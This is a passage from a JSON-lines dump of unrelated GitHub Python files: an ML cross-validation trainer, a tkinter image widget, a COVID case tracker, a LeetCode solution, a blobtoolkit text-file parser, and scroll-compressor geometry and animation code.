pandas as pd\n\n\nclass Train:\n    def __init__(self,\n                 dataframe: pd.DataFrame , \n                 train_cfg: dict) -> None:\n        \n        self.dataframe = dataframe\n        self.train_cfg = train_cfg\n        self.clf = []\n        self.clf_path = []\n        self.predictions = None\n        self.residuals = None\n        self.goodness_of_fit = None\n        \n\n    def train(self):\n        \"\"\"\n        The function takes in a Training DataFrame and a Train Config.\n        Splits the DataFrame into Train and Validation sets.\n        Trains a model according to the config and stores it in the output path. 
\n\n        Args:\n            dataframe (pd.DataFrame): Training DataFrame\n            train_cfg (dict): The dictionary should have the following format\n            KEEP THE KEY VALUES AS GIVEN BELOW!!!\n            \n            training: {\n                model: \n                    \"logistic\" for Logistic Regression\n                    \"linear\" for Linear Regression\n            }\n\n        Returns:\n            str: the path to the trained classifier.\n        \"\"\"\n        first = True\n        for fold in range(self.train_cfg['num_folds']):\n            # get the Training and validation data for this fold\n            # training data is where the kfold is not equal to the fold\n            # validation data is where the kfold is equal to the fold\n            train_df = self.dataframe[self.dataframe.kfold != fold].reset_index(drop=True)\n            val_df = self.dataframe[self.dataframe.kfold==fold].reset_index(drop=True)\n            \n            # drop the kfold and target column \n            # convert it into a numpy array\n            x_train = train_df.drop(['kfold'] + self.train_cfg['target_cols'],axis=1).values\n            y_train = train_df[self.train_cfg['target_cols']].values\n            # perform the same for validation\n            x_val = val_df.drop(['kfold'] + self.train_cfg['target_cols'],axis=1).values\n            # TODO: works only if you have single target column\n            # TODO: find a way to make it generic for n number of target columns\n            y_val = val_df[self.train_cfg['target_cols']].values[:,0]\n            \n            # fetch the model from the model dispatcher\n            clf = dispatcher.models[self.train_cfg['model']]\n            \n            #fit the model on the training data\n            clf.fit(x_train,y_train)\n            \n            # create probabilities for validation samples\n            preds = clf.predict_proba(x_val)[:,1]\n            res = y_val - preds\n            scores = matrices.metrics(y_val,preds)\n            \n            if first:\n                self.predictions = preds\n                self.residuals = res\n                self.goodness_of_fit = scores\n                first = False\n            else:\n                self.predictions += preds\n                self.residuals += res\n                self.goodness_of_fit = {key: self.goodness_of_fit[key]+scores[key] for key in scores.keys()}\n\n            # save the model along with fold number\n            clf_path = f\"{self.train_cfg['output_path']}/{self.train_cfg['model']}_{fold}.pkl\"\n            joblib.dump(clf,clf_path)\n            \n            self.clf.append(clf)\n            self.clf_path.append(clf_path)\n        \n        self.predictions /= len(self.clf)\n        self.residuals /= len(self.clf)\n        self.goodness_of_fit = {key: self.goodness_of_fit[key]/len(self.clf) for key in self.goodness_of_fit.keys()}\n        \n        \n        utils.scatter_plot(x_data=self.predictions,\n                           y_data=self.residuals,\n                           title=f\"Residuals_Vs_FittedValues\",\n                           x_title=\"Predictions\",\n                           y_title=\"Residuals\",\n                           output_path=f\"{self.train_cfg['output_path']}/Residuals_Vs_Fitted_Values.html\")\n        \n        return self.clf, self.clf_path \n    \n    def get_metrics(self) -> dict:\n        return self.goodness_of_fit","repo_name":"yash276/mlTemplate","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"28108671397","text":"import tkinter as tk\nimport PIL\nfrom PIL import ImageTk, Image # Pillow is needed.\n\ndef load_image(canvas, filepath, bounds=None):\n    \"\"\"Takes a tk.Canvas and a filepath, loads image into canvas\"\"\"\n\n    image_data = Image.open(filepath)\n    if bounds:\n        image_data.thumbnail(bounds, PIL.Image.ANTIALIAS)\n    canvas.image = ImageTk.PhotoImage(image_data)\n    canvas.create_image(0, 0, image=canvas.image, anchor=tk.NW)\n\nclass ImageFrame(tk.Frame):\n    \"\"\"A frame for adding images to GUI.\"\"\"\n\n    def __init__(\n            self,\n            parent,\n            image=None,\n            width=265,\n            height=370,\n            *args,\n            **kwargs):\n\n        self.parent = parent\n        self.image = image\n        self.width = width\n        self.height = height\n        
tk.Frame.__init__(self, parent, *args, **kwargs)\n        self.canvas_frame = tk.Frame(self)\n\n        self.canvas = tk.Canvas(\n            self.canvas_frame,\n            width=self.width,\n            height=self.height\n        )\n        self.canvas.pack(side = tk.LEFT)\n        if self.image:\n            load_image(self.canvas, self.image)\n        self.canvas_frame.pack()\n\n    def load_image(self, imagepath, width=None, height=None):\n        \"\"\"Loads new image into canvas, updating size if needed.\"\"\"\n\n        if width:\n            self.width = width\n            self.canvas[\"width\"] = width\n        if height:\n            self.height = height\n            self.canvas[\"height\"] = height\n\n        self.image = imagepath\n        size = (self.width, self.height)\n        load_image(self.canvas, self.image, bounds=size)\n        self.canvas.update_idletasks() # Might have to be done to canvas instead\n","repo_name":"morngrar/betterdialogs","sub_path":"betterdialogs/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8092203860","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.dates import DateFormatter\nimport matplotlib.ticker as ticker\n\n\n# Section 2 - Loading and Selecting Data\ndf = pd.read_csv('https://raw.githubusercontent.com/datasets/covid-19/master/data/countries-aggregated.csv', parse_dates=['Date'])\ncountries = ['India','Italy', 'US', 'France', 'China']\ndf = df[df['Country'].isin(countries)]\n\n# Section 3 - Creating a Summary Column\ndf['Cases'] = df[['Confirmed', 'Recovered', 'Deaths']].sum(axis=1)\n\ndf = df.pivot(index='Date', columns='Country', values='Cases')\ncountries = list(df.columns)\ncovid = df.reset_index('Date')\ncovid.set_index(['Date'], inplace=True)\ncovid.columns = countries\n\n# Section 5 - Calculating Rates per 100,000\npopulations = {'India':37664517, 'Italy': 67802690 , 'US': 330548815, 'France': 65239883, 'China':1438027228}\npercapita = covid.copy()\nfor country in list(percapita.columns):\n    percapita[country] = percapita[country]/populations[country]*100000\n    new_col = country+'_DAILY'\n    df[new_col] = df[country] -df[country].shift(1)\n\n\n## US State data\ndf_s = pd.read_csv('https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-states.csv', parse_dates=['date'])\nstates = ['Oregon','Washington', 'New York', 'New Jersey', 'Louisiana']\ndf_s = df_s[df_s['state'].isin(states)]\n\ndf_s = df_s.pivot(index='date', columns='state', values='cases')\n\nfor st in states:\n    new_col = st+'_DAILY'\n    df_s[new_col] = df_s[st] -df_s[st].shift(1)\n","repo_name":"supermandar/covid19","sub_path":"covid_tracker.py","file_name":"covid_tracker.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25488966653","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/check-if-number-is-a-sum-of-powers-of-three/\n# Author: Miao Zhang\n# Date: 2021-06-07\n\nclass Solution:\n def checkPowersOfThree(self, n: int) -> bool:\n last = float('inf')\n while n:\n p = 0\n cur = 1\n while cur * 3 <= n:\n cur *= 3\n p += 1\n if p == last: return False\n last = p\n n -= cur\n return True\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/checkifNumberisaSumofPowersofThree/checkifNumberisaSumofPowersofThree.py","file_name":"checkifNumberisaSumofPowersofThree.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35299649341","text":"#!/usr/bin/env python3\n# pylint: disable=too-many-locals,too-many-branches,too-many-arguments,too-many-statements,too-many-nested-blocks\n\n\"\"\"Parse text files into fields.\"\"\"\n\nimport math\nimport pathlib\nimport re\nfrom collections import defaultdict\n\nfrom ..lib import file_io\nfrom .field import Array\nfrom .field import Category\nfrom .field import MultiArray\nfrom .field import Variable\n\n\ndef parse_header_row(delimiter, header_row, columns):\n \"\"\"Parse header row.\"\"\"\n head = re.split(delimiter, header_row)\n for i, col in enumerate(columns):\n try:\n index, name = col.split(\"=\")\n if not index.isdigit():\n try:\n index = head.index(index)\n columns[i] = \"%d=%s\" % (index + 1, name)\n except ValueError:\n pass\n except ValueError:\n if col.isdigit():\n try:\n columns[i] = \"%s=%s\" % (col, head[int(col) - 1])\n except IndexError:\n exit(\"ERROR: column index out of range '%s'\" % col)\n else:\n try:\n index = head.index(col)\n columns[i] = \"%s=%s\" % (str(index + 1), col)\n except ValueError:\n pass\n if not columns:\n return head\n return columns\n\n\ndef map_fields(delimiter, first_row, columns):\n \"\"\"Set column headers and field types.\"\"\"\n sample_data = re.split(delimiter, first_row)\n width = len(sample_data)\n cols = []\n headers = {}\n types = {}\n for i, col in enumerate(columns):\n if col:\n try:\n index, name = col.split(\"=\")\n if index.isdigit() and width >= int(index):\n cols.append(int(index) - 1)\n headers[int(index) - 1] = name\n else:\n exit(\"ERROR: column index out of range '%s'\" % col)\n except ValueError:\n if col.isdigit():\n exit(\"ERROR: no name specified for column %s\" % col)\n else:\n cols.append(i)\n headers[i] = col\n for col in cols:\n if re.search(\"identifier\", headers[col], re.IGNORECASE):\n types[headers[col]] = \"Identifier\"\n else:\n datum = sample_data[col]\n try:\n float(datum)\n types[headers[col]] = \"Variable\"\n except ValueError:\n types[headers[col]] = \"Category\"\n return cols, headers, types, width\n\n\ndef parse_rows(delimiter, lines, width, no_array, cols, types, headers):\n \"\"\"Parse rows and test for duplicate identifiers.\"\"\"\n ids = set()\n rows = []\n id_rows = defaultdict(list)\n index = 0\n array = False\n for line in lines:\n line = line.replace('\"', \"\")\n data = re.split(delimiter, line)\n if len(data) < width:\n continue\n row = {}\n for col in cols:\n if types[headers[col]] == \"Identifier\":\n if data[col] in ids:\n if no_array:\n exit(\n \"ERROR: found multiple instances of Identifier '%s'\"\n % data[col]\n )\n array = True\n ids.add(data[col])\n id_rows[data[col]].append(index)\n index += 1\n else:\n row[headers[col]] = data[col]\n rows.append(row)\n return rows, id_rows, array, ids\n\n\ndef rows_to_results(rows, id_rows, types, 
array, field_name):\n \"\"\"Make fields from rows.\"\"\"\n field_names = [type for type in types.keys() if types[type] != \"Identifier\"]\n if field_name:\n results = {field_name: {}}\n else:\n results = {name: {} for name in field_names}\n for ident, indices in id_rows.items():\n if field_name:\n if len(field_names) > 1:\n results[field_name][ident] = []\n elif array:\n for name in field_names:\n results[name][ident] = []\n for index in indices:\n row = rows[index]\n if field_name:\n data = [row[name] for name in field_names]\n if len(field_names) == 1:\n data = data[0]\n if array:\n results[field_name][ident].append(data)\n else:\n results[field_name][ident] = data\n else:\n for name in field_names:\n if array:\n results[name][ident].append([row[name]])\n else:\n results[name][ident] = row[name]\n return results\n\n\ndef results_to_fields(results, types, cols, headers, text_file, delimiter, identifiers):\n \"\"\"Convert results to fields.\"\"\"\n fields = []\n field_types = {\n \"Variable\": Variable,\n \"Category\": Category,\n \"Array\": Array,\n \"MultiArray\": MultiArray,\n }\n array_type = \"array\"\n for col in cols:\n if types[headers[col]] == \"Identifier\":\n id_column = col\n else:\n if array_type and types[headers[col]] != array_type:\n array_type = \"mixed\"\n break\n array_type = \"string\" if types[headers[col]] == \"Category\" else \"float\"\n for key, values in results.items():\n ident, sample = next(iter(values.items()))\n blank = \"NA\" if types[headers[col]] == \"Category\" else 0\n if not identifiers.validate_list(list(results[key].keys())):\n print(\n \"WARN: Contig names in the text file did not match dataset identifiers.\"\n )\n kwargs = {\n \"meta\": {\n \"field_id\": key,\n \"name\": key,\n \"preload\": False,\n \"active\": False,\n \"file\": text_file,\n \"id_column\": id_column,\n \"delimiter\": delimiter,\n \"datatype\": array_type,\n },\n \"parents\": [],\n }\n if isinstance(sample, list):\n blank = []\n array_headers = []\n index = -1\n if key in types:\n array_headers.append(key)\n if types[key] == \"Category\" and \"category_slot\" not in kwargs:\n kwargs.update({\"category_slot\": 0})\n else:\n for col in cols:\n if types[headers[col]] != \"Identifier\":\n index += 1\n array_headers.append(headers[col])\n if (\n types[headers[col]] == \"Category\"\n and \"category_slot\" not in kwargs\n ):\n kwargs.update({\"category_slot\": index})\n kwargs.update({\"headers\": array_headers})\n if isinstance(sample[0], list):\n field_type = field_types[\"MultiArray\"]\n kwargs.update({\"type\": \"multiarray\"})\n else:\n field_type = field_types[\"Array\"]\n kwargs.update({\"type\": \"array\"})\n else:\n field_type = field_types[types[key]]\n kwargs.update({\"type\": types[key].lower()})\n\n if kwargs[\"type\"] == \"variable\":\n vals = []\n is_float = False\n for ident in identifiers.values:\n value = results[key][ident] if ident in results[key] else blank\n vals.append(value)\n if kwargs[\"type\"] == \"variable\" and not is_float:\n try:\n int(value)\n except ValueError:\n is_float = True\n min_max = [math.inf, -math.inf]\n values = []\n for value in vals:\n value = float(value) if is_float else int(value)\n values.append(value)\n min_max = [min(min_max[0], value), max(min_max[1], value)]\n kwargs[\"meta\"].update({\"range\": min_max})\n if is_float:\n kwargs[\"meta\"].update({\"datatype\": \"float\"})\n else:\n kwargs[\"meta\"].update({\"datatype\": \"integer\"})\n if min_max[0] < 0 or min_max[0] > min_max[1] / 1000:\n kwargs[\"meta\"].update({\"scale\": 
\"scaleLinear\"})\n else:\n kwargs[\"meta\"].update({\"scale\": \"scaleLog\"})\n if min_max[0] == 0:\n kwargs[\"meta\"].update({\"clamp\": 0.01})\n else:\n values = [\n results[key][ident] if ident in results[key] else blank\n for ident in identifiers.values\n ]\n if kwargs[\"type\"] == \"category\":\n kwargs[\"meta\"].update({\"datatype\": \"string\"})\n field = field_type(key, values=values, **kwargs)\n fields.append(field)\n return fields\n\n\ndef set_delimiter(delimiter, *, sample=None):\n \"\"\"Set text delimiter.\"\"\"\n if delimiter == \"whitespace\":\n if sample is not None:\n if \"\\t\" in sample:\n return re.compile(r\"\\t\")\n return re.compile(r\"\\s+\")\n else:\n return re.compile(r\"%s\" % delimiter)\n\n\ndef parse_text(text_file, delimiter, columns, header, no_array, identifiers):\n \"\"\"Parse text file into Category and/or Variable fields.\"\"\"\n try:\n text_file, field_name = text_file.split(\"=\")\n except ValueError:\n field_name = False\n data = file_io.read_file(text_file)\n lines = data.split(\"\\n\")\n delimit = set_delimiter(delimiter, sample=lines[0])\n if columns:\n columns = columns.split(\",\")\n else:\n columns = []\n if header:\n header_row = lines.pop(0).replace('\"', \"\")\n columns = parse_header_row(delimit, header_row, columns)\n cols, headers, types, width = map_fields(\n delimit, lines[0].replace('\"', \"\"), columns\n )\n rows, id_rows, array = parse_rows(\n delimit, lines, width, no_array, cols, types, headers\n )[:3]\n # if not identifiers.validate_list(list(ids)):\n # exit('ERROR: contig names in the text file did not match dataset identifiers.')\n results = rows_to_results(rows, id_rows, types, array, field_name)\n fields = results_to_fields(\n results, types, cols, headers, text_file, delimiter, identifiers\n )\n # meta = {'file': text_file}\n return fields\n # results = defaultdict(list)\n # for line in lines:\n # if header:\n # row = re.split(' +', line)\n # if len(row) > 1:\n # if row[1].startswith('v.'):\n # meta.update({'version': row[1]})\n # elif row[1] == 'Mode:':\n # meta.update({'mode': row[2]})\n # meta.update({'field_id': \"trnascan_%s\" % row[2].lower()})\n # elif row[1].startswith('------'):\n # header = False\n # else:\n # row = re.split(r' +|\\t', line)\n # if len(row) == 9:\n # results[row[0]].append([row[4], row[5]])\n # if not identifiers.validate_list(list(results.keys())):\n # raise UserWarning('Contig names in the tRNAScan file did not match dataset identifiers.')\n # values = [results[id] if id in results else [] for id in identifiers.values]\n # trnascan_field = MultiArray(meta['field_id'],\n # values=values,\n # meta=meta,\n # headers=('tRNA_type', 'Anticodon'),\n # parents=['children']\n # )\n # return trnascan_field\n\n\ndef apply_filter(ids, text_file, **kwargs):\n \"\"\"Filter Text file.\"\"\"\n suffix = kwargs[\"--suffix\"]\n path = pathlib.Path(text_file)\n outfile = str(path.parent / (path.stem + \".\" + suffix + path.suffix))\n data = file_io.read_file(text_file)\n lines = data.split(\"\\n\")\n delimiter = kwargs[\"--text-delimiter\"]\n delimit = set_delimiter(delimiter, sample=lines[0])\n id_col = int(kwargs[\"--text-id-column\"]) - 1\n output = []\n if kwargs[\"--text-header\"]:\n header_row = lines.pop(0)\n header_row.rstrip()\n output.append(header_row)\n for line in lines:\n line = line\n row = re.split(delimit, line.replace('\"', \"\"))\n try:\n if row[id_col] in ids:\n output.append(line)\n except IndexError:\n output.append(line)\n file_io.write_file(outfile, output, plain=True)\n\n\ndef parse(files, 
**kwargs):\n \"\"\"Parse all text files.\"\"\"\n parsed = []\n for file in files:\n try:\n fileData = parse_text(\n file,\n delimiter=kwargs[\"--text-delimiter\"],\n columns=kwargs[\"--text-cols\"],\n header=kwargs[\"--text-header\"],\n no_array=kwargs[\"--text-no-array\"],\n identifiers=kwargs[\"dependencies\"][\"identifiers\"],\n )\n except AttributeError:\n continue\n parsed = parsed + fileData\n return parsed\n\n\ndef parent():\n \"\"\"Set standard metadata for text.\"\"\"\n return []\n","repo_name":"blobtoolkit/blobtoolkit","sub_path":"src/blobtools/lib/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":13191,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"32"} +{"seq_id":"35366805285","text":"from __future__ import print_function\n\nfig_size = [8,10]\n\nimport math\nimport numpy as np\nimport pylab\nfrom pylab import arange,pi,sin,cos,sqrt,tan\nimport threading\nimport wx\n\nimport os\n#import scrollCalcs as Calcs\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nglobal geo,setDiscGeo,coords_inv,circle,sortAnglesCCW,Shave,plotScrollSet\nglobal polyarea,theta_d\nimport matplotlib.pyplot as pyplot\nfrom PDSim.scroll import common_scroll_geo\nfrom PDSim.scroll.common_scroll_geo import coords_inv, coords_norm\n \nclass geoVals:\n \"\"\" \n A class which contains the fields related the \n scroll compressor geometry\n \"\"\"\n # Default values for Sanden Compressor #\n ## DO NOT MODIFY THESE VALUES ##\n rb=0.003522\n phi_i0=0.19829\n phi_is=4.7\n phi_ie=15.5\n phi_o0=-1.1248\n phi_os=1.8\n phi_oe=15.5\n h=0.03289\n disc_x0=-0.007\t\n disc_y0=-0.0011\t\n disc_R=0.0060198\n\n def __init__(self, **kwargs):\n self.Load()\n def Load(self):\n # Default values for Sanden Compressor #\n ## DO NOT MODIFY THESE VALUES ##\n self.rb=0.003522\n self.phi_i0=0.19829\n self.phi_is=4.7\n self.phi_ie=15.5\n self.phi_o0=-1.1248\n self.phi_os=1.8\n self.phi_oe=15.5\n self.h=0.03289\n # disc_x0=-0.007\t\n # disc_y0=-0.0011\t\n # disc_R=0.0060198\n self.ro=self.rb*(pi-self.phi_i0+self.phi_o0)\n #Load a default discharge geometry\n setDiscGeo(self)\n\ndef LoadGeo():\n \"\"\"\n Returns a class containing the default parameters for the scroll compressor\n \n ======= =========\n r_b 0.003522 \n phi_i0 0.19829\n phi_is 4.7\n phi_ie 15.5\n phi_o0 -1.1248\n phi_os 1.8\n phi_oe 15.5\n h 0.03289\n disc_x0 -0.007\n disc_y0 -0.0011\n disc_R 0.0060198\n ======= =========\n \n \"\"\"\n return geoVals()\n \ndef setDiscGeo(geo,Type='Sanden',r2=0.001,**kwargs):\n \"\"\"\n Sets the discharge geometry for the compressor based on the arguments.\n Also sets the radius of the wall that contains the scroll set\n \n Arguments:\n geo : geoVals class\n class containing the scroll compressor geometry\n Type : string\n Type of discharge geometry, options are ['Sanden'],'2Arc','ArcLineArc'\n r2 : float or string\n Either the radius of the smaller arc as a float or 'PMP' for perfect meshing\n If Type is 'Sanden', this value is ignored\n \n Keyword Arguments:\n \n ======== ======================================================================\n Value Description\n ======== ======================================================================\n r1 the radius of the large arc for the arc-line-arc solution type\n ======== ======================================================================\n \n \"\"\"\n \n #Recalculate the orbiting radius\n geo.ro=geo.rb*(pi-geo.phi_i0+geo.phi_o0)\n if Type == 'Sanden':\n 
geo.x0_wall=0.0\n        geo.y0_wall=0.0\n        geo.r_wall=0.065\n        setDiscGeo(geo,Type='ArcLineArc',r2=0.003178893902,r1=0.008796248080)\n    elif Type == '2Arc':\n        (x_is,y_is) = common_scroll_geo.coords_inv(geo.phi_is,geo,0,'fi') \n        (x_os,y_os) = common_scroll_geo.coords_inv(geo.phi_os,geo,0,'fo')\n        (nx_is,ny_is) = common_scroll_geo.coords_norm(geo.phi_is,geo,0,'fi')\n        (nx_os,ny_os) = common_scroll_geo.coords_norm(geo.phi_os,geo,0,'fo')\n        dx=x_is-x_os\n        dy=y_is-y_os\n        \n        r2max=0\n        a=cos(geo.phi_os-geo.phi_is)+1.0\n        b=geo.ro*a-dx*(sin(geo.phi_os)-sin(geo.phi_is))+dy*(cos(geo.phi_os)-cos(geo.phi_is))\n        c=1.0/2.0*(2.0*dx*sin(geo.phi_is)*geo.ro-2.0*dy*cos(geo.phi_is)*geo.ro-dy**2-dx**2)\n        if abs((geo.phi_os+pi)-geo.phi_is) < 1e-8:\n            r2max=-c/b\n        elif geo.phi_os-(geo.phi_is-pi)>1e-12:\n            r2max=(-b+sqrt(b**2-4.0*a*c))/(2.0*a)\n        else:\n            print('error with starting angles phi_os %.16f phi_is-pi %.16f' %(geo.phi_os,geo.phi_is-pi))\n        \n        if type(r2) is not float and r2=='PMP':\n            r2=r2max\n    \n        if r2>r2max:\n            print('r2 is too large, max value is : %0.5f' %(r2max))\n        \n        xarc2 =  x_os+nx_os*r2\n        yarc2 =  y_os+ny_os*r2\n        \n        r1=((1.0/2*dy**2+1.0/2*dx**2+r2*dx*sin(geo.phi_os)-r2*dy*cos(geo.phi_os))\n               /(r2*cos(geo.phi_os-geo.phi_is)+dx*sin(geo.phi_is)-dy*cos(geo.phi_is)+r2))\n        \n        \n        ## Negative sign since you want the outward pointing unit normal vector\n        xarc1 = x_is-nx_is*r1\n        yarc1 = y_is-ny_is*r1\n        \n        geo.xa_arc2=xarc2\n        geo.ya_arc2=yarc2\n        geo.ra_arc2=r2\n        geo.t1_arc2=math.atan2(yarc1-yarc2,xarc1-xarc2)\n        geo.t2_arc2=math.atan2(y_os-yarc2,x_os-xarc2)\n        while geo.t2_arc2<geo.t1_arc2:\n            geo.t2_arc2=geo.t2_arc2+2.0*pi\n        \n        geo.xa_arc1=xarc1\n        geo.ya_arc1=yarc1\n        geo.ra_arc1=r1\n        geo.t1_arc1=math.atan2(yarc2-yarc1,xarc2-xarc1)\n        geo.t2_arc1=math.atan2(y_is-yarc1,x_is-xarc1)\n        \n    elif Type=='ArcLineArc':\n        (x_is,y_is) = common_scroll_geo.coords_inv(geo.phi_is,geo,0,'fi') \n        (x_os,y_os) = common_scroll_geo.coords_inv(geo.phi_os,geo,0,'fo')\n        (nx_is,ny_is) = common_scroll_geo.coords_norm(geo.phi_is,geo,0,'fi')\n        (nx_os,ny_os) = common_scroll_geo.coords_norm(geo.phi_os,geo,0,'fo')\n        dx=x_is-x_os\n        dy=y_is-y_os\n        \n        r2max=0\n        a=cos(geo.phi_os-geo.phi_is)+1.0\n        b=geo.ro*a-dx*(sin(geo.phi_os)-sin(geo.phi_is))+dy*(cos(geo.phi_os)-cos(geo.phi_is))\n        c=1.0/2.0*(2.0*dx*sin(geo.phi_is)*geo.ro-2.0*dy*cos(geo.phi_is)*geo.ro-dy**2-dx**2)\n        if geo.phi_os-(geo.phi_is-pi)>1e-12:\n            r2max=(-b+sqrt(b**2-4.0*a*c))/(2.0*a)\n        elif geo.phi_os-(geo.phi_is-pi)<1e-12:\n            r2max=-c/b\n        else:\n            print('error with starting angles phi_os %.16f phi_is-pi %.16f' %(geo.phi_os,geo.phi_is-pi))\n        \n        if type(r2) is not float and r2=='PMP':\n            r2=r2max\n    \n        if r2>r2max:\n            print('r2 is too large, max value is : %0.5f' %(r2max))\n        \n        xarc2 =  x_os+nx_os*r2\n        yarc2 =  y_os+ny_os*r2\n        \n        if 'r1' not in kwargs:\n            r1=r2+geo.ro\n        else:\n            r1=kwargs['r1']\n        \n        ## Negative sign since you want the outward pointing unit normal vector\n        xarc1 = x_is-nx_is*r1\n        yarc1 = y_is-ny_is*r1\n        \n        geo.xa_arc2=xarc2\n        geo.ya_arc2=yarc2\n        geo.ra_arc2=r2\n        geo.t2_arc2=math.atan2(y_os-yarc2,x_os-xarc2)\n        \n        geo.xa_arc1=xarc1\n        geo.ya_arc1=yarc1\n        geo.ra_arc1=r1\n        geo.t2_arc1=math.atan2(y_is-yarc1,x_is-xarc1)\n        \n        alpha=math.atan2(yarc2-yarc1,xarc2-xarc1)\n        d=sqrt((yarc2-yarc1)**2+(xarc2-xarc1)**2)\n        beta=math.acos((r1+r2)/d)\n        L=sqrt(d**2-(r1+r2)**2)\n        t1=alpha+beta\n        \n        (xint,yint)=(xarc1+r1*cos(t1)+L*sin(t1),yarc1+r1*sin(t1)-L*cos(t1))\n        t2=math.atan2(yint-yarc2,xint-xarc2)\n        \n        geo.t1_arc1=t1\n#        (geo.t1_arc1,geo.t2_arc1)=sortAnglesCW(geo.t1_arc1,geo.t2_arc1)\n        \n        geo.t1_arc2=t2\n#        (geo.t1_arc2,geo.t2_arc2)=sortAnglesCCW(geo.t1_arc2,geo.t2_arc2)\n\n        while geo.t2_arc2<geo.t1_arc2:\n            geo.t2_arc2=geo.t2_arc2+2.0*pi\n\n        self.OS = plotScrollSet(self.theta,\n                                axis=self.pltpanel.axes,\n                                geo=self.geo,\n                                lw=1,\n                                discOn=False,\n                                offsetScroll = self.geo.phi_ie_offset>0)\n        \n        self.ax = self.pltpanel.axes\n        \n        if disc_xy_coords is not None:\n            self.ax.plot(disc_xy_coords[0], disc_xy_coords[1])\n        \n        sizer.Layout()\n        \n        self.SetSize(sizer.GetMinSize())\n        \n        self.writing_animation = False\n        self.param_dict = param_dict\n        self.orbiting_layers = []\n        if start:\n            self.start()\n        \n    def OnSaveAnimation(self, event):\n        self.SaveAnimation.Enable(False)\n        self.writing_animation = True\n        \n    def OnDoneSavingAnimation(self):\n        self.SaveAnimation.Enable(True)\n        self.writing_animation = False\n        \n        import subprocess\n        subprocess.call('convert frame_*.png frames.gif',shell = True)\n        import glob\n        for file in glob.glob('frame_*.png'):\n            os.remove(file)\n        print('all done - saved to frames.gif')\n        \n    
def OnApplyLayers(self, event):\n self.remove_orbiting_layers()\n self.ax.cla()\n self.OS = plotScrollSet(self.theta,\n axis=self.pltpanel.axes,\n geo=self.geo,\n lw=1,\n discOn=False,\n offsetScroll = self.geo.phi_ie_offset>0)\n self.apply_stationary_layers()\n self.apply_orbiting_layers(self.theta)\n\n self.ax.figure.canvas.draw() #Annoyingly this draw is required to flush the ghost orbiting scroll\n \n def apply_stationary_layers(self):\n if self.LayerCoordinateAxes.IsChecked():\n \n self.ax.plot(0, 0, 'k+')\n self.ax.plot([0, 0.01], [0,0], 'k')\n self.ax.plot([0,0], [0.01, 0], 'k')\n self.ax.text(0.01,0,'$x$')\n self.ax.text(0,0.01,'$y$')\n \n def _proj_onto_xd(self, x, y, beta):\n \n # unit vector pointing in the +xbeta direction\n ubeta = np.array([cos(beta),sin(beta)])\n r = np.array([x,y])\n proj = np.dot(r,ubeta)*ubeta\n return proj\n \n def _proj_onto_yd(self, x, y, beta):\n \n # unit vector pointing in the +xbeta direction\n ubeta = np.array([-cos(beta),sin(beta)])\n r = np.array([x,y])\n proj = np.dot(r,ubeta)*ubeta\n return proj\n \n def apply_orbiting_layers(self, theta = 0):\n \n self.remove_orbiting_layers()\n \n def rotated_rectangle(x0,y0,w,h,rot):\n \n x = np.array([-w/2,w/2,w/2,-w/2,-w/2])\n y = np.array([-h/2,-h/2,h/2,h/2,-h/2])\n \n xrot = x*cos(rot)-y*sin(rot)\n yrot = x*sin(rot)+y*cos(rot) \n \n return xrot+x0, yrot+y0\n \n if self.LayerCoordinateAxes.IsChecked():\n \n om = self.geo.phi_ie-theta-pi/2.0\n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n self.orbiting_layers.append(self.ax.plot(xo, yo, 'ko')[0])\n \n beta = self.param_dict.get('beta', pi/6)\n rring = self.param_dict.get('oldham_ring_radius', 0.04)\n lkey = wkey = self.param_dict.get('oldham_key_width', 0.005)\n \n \n if self.LayerOldham.IsChecked():\n \n om = self.geo.phi_ie-theta-pi/2.0\n \n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n OSkeys = [dict(r = rring, width = wkey, length = lkey, xbeta_offset = self.param_dict['pin3_xbeta_offset']),\n dict(r = rring, width = wkey, length = lkey, betaplus = pi, xbeta_offset = self.param_dict['pin4_xbeta_offset'])]\n FSkeys = [dict(r = rring, width = wkey, length = lkey, ybeta_offset = self.param_dict['pin1_ybeta_offset']),\n dict(r = rring, width = wkey, length = lkey, betaplus = pi, ybeta_offset = self.param_dict['pin2_ybeta_offset'])]\n \n for key in OSkeys:\n r = key['r']\n width = key['width']\n length = key['length']\n xbeta_offset = key['xbeta_offset']\n betaplus = key.get('betaplus',0)\n \n betakey = beta + betaplus + pi/2\n \n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n xbeta = self.geo.ro*cos(om)*cos(beta)+self.geo.ro*sin(om)*sin(beta) + xbeta_offset\n ybeta = 0 \n \n xoffset = xbeta*cos(beta)+ybeta*sin(beta)\n yoffset = xbeta*sin(beta)-ybeta*cos(beta)\n \n xoffset_slot = xbeta_offset*cos(beta) #ybeta_offset is zero\n yoffset_slot = xbeta_offset*sin(beta)\n \n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),length+3*self.geo.ro,width,beta+pi/2)\n self.orbiting_layers.append(self.ax.fill(x+xo+xoffset_slot, y+yo+yoffset_slot, 'green', alpha = 0.5)[0])\n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),width,length,beta)\n self.orbiting_layers.append(self.ax.fill(x+xoffset,y+yoffset,'k')[0])\n \n for key in FSkeys:\n \n r = key['r']\n width = key['width']\n length = key['length']\n ybeta_offset = key['ybeta_offset']\n 